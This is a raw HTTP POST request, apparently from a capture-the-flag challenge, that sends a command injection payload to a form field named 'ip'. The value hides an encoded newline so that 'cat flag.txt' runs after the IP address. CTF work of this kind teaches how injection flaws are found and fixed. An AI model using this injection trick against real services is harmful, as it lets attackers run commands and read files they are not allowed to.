POST / HTTP/1.1
Host: challenges.ctf.compfest.id:20001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://challenges.ctf.compfest.id:20001
Connection: keep-alive
Referer: http://challenges.ctf.compfest.id:20001/
Upgrade-Insecure-Requests: 1
Priority: u=0, i

ip=8.8.8.8+%0Acat+flag.txt